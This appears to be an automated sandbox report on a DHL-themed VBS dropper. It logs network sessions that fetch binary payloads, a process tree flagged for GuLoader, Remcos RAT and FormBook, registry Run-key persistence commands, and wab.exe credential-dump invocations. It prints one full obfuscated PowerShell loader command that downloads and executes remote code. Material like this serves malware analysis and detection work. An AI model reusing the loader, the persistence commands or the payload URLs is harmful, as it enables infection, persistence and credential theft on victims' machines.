                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.5 | 49722 | 87.121.105.163 | 80 | 1968 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 07:41:12.957057953 CEST | 172 | OUT | GET /PUzAKuQ35.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: 87.121.105.163
                                              Cache-Control: no-cache
                                              Apr 26, 2024 07:41:13.191859961 CEST | 1289 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:41:13 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Last-Modified: Thu, 25 Apr 2024 09:02:52 GMT
                                              ETag: "41e40-616e80d528700"
                                              Accept-Ranges: bytes
                                              Content-Length: 269888
                                              Content-Type: application/octet-stream


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.5 | 49723 | 137.220.252.40 | 80 | 5244 | C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 07:41:48.924058914 CEST | 459 | OUT | GET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1
                                              Host: www.387mfyr.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-us
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                              Apr 26, 2024 07:41:49.208837032 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 05:41:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.5 | 49704 | 188.212.111.134 | 443 | 2132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-04-26 05:39:56 UTC | 172 | OUT | GET /Methink1.thn HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: europrotectie.ro
                                              Connection: Keep-Alive
                                              2024-04-26 05:39:56 UTC | 243 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:39:56 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Thu, 25 Apr 2024 08:04:28 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 465652
                                              Vary: Accept-Encoding,User-Agent


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.5 | 49713 | 46.254.34.12 | 443 | 1496 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-04-26 05:40:36 UTC | 179 | OUT | GET /FIPWKWOaFXJGe178.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: duelvalenza.it
                                              Cache-Control: no-cache
                                              2024-04-26 05:40:36 UTC | 299 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Fri, 26 Apr 2024 05:40:36 GMT
                                              Server: Apache
                                              Location: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
                                              Cache-Control: max-age=1800
                                              Expires: Fri, 26 Apr 2024 06:10:36 GMT
                                              Content-Length: 254
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin">here</a>.</p></body></html>


                                              Target ID: 0
                                              Start time: 07:39:51
                                              Start date: 26/04/2024
                                              Path: C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit): false
                                              Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
                                              Imagebase: 0x7ff7720c0000
                                              File size: 170'496 bytes
                                              MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Reputation: high
                                              Has exited: true

                                              Target ID: 2
                                              Start time: 07:39:51
                                              Start date: 26/04/2024
                                              Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit): false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. 
FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve 
Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. 
Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;"
                                              Imagebase: 0x7ff7be880000
                                              File size: 452'608 bytes
                                              MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation: high
                                              Has exited: true

                                              Target ID: 3
                                              Start time: 07:39:51
                                              Start date: 26/04/2024
                                              Path: C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit): false
                                              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase: 0x7ff6d64d0000
                                              File size: 862'208 bytes
                                              MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Reputation: high
                                              Has exited: true

                                              Target ID: 4
                                              Start time: 07:39:54
                                              Start date: 26/04/2024
                                              Path: C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit): false
                                              Commandline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
                                              Imagebase: 0x7ff6403e0000
                                              File size: 289'792 bytes
                                              MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Reputation: high
                                              Has exited: true

                                              Target ID: 5
                                              Start time: 07:40:01
                                              Start date: 26/04/2024
                                              Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit): true
                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted]
                                              Imagebase:0xfe0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2490726122.0000000008980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2461742751.0000000005DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2491020170.000000000A67A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:07:40:02
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:07:40:24
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:9
                                              Start time:07:40:33
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:07:40:33
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:07:40:33
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
                                              Imagebase:0x560000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:13
                                              Start time:07:40:41
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
                                              Imagebase:0x6c0000
                                              File size:147'456 bytes
                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:14
                                              Start time:07:40:42
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted]
                                              Imagebase:0xfe0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.3250010228.0000000005A14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:07:40:42
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:17
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:18
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:07:40:43
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:21
                                              Start time:07:40:44
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:22
                                              Start time:07:40:50
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted]
                                              Imagebase:0xfe0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000016.00000002.2900248668.0000000008830000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000016.00000002.2872130350.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.2900609762.000000000902B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Target ID:23
                                              Start time:07:40:51
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:24
                                              Start time:07:41:07
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:25
                                              Start time:07:41:07
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:true

                                              Target ID:26
                                              Start time:07:41:11
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:27
                                              Start time:07:41:11
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
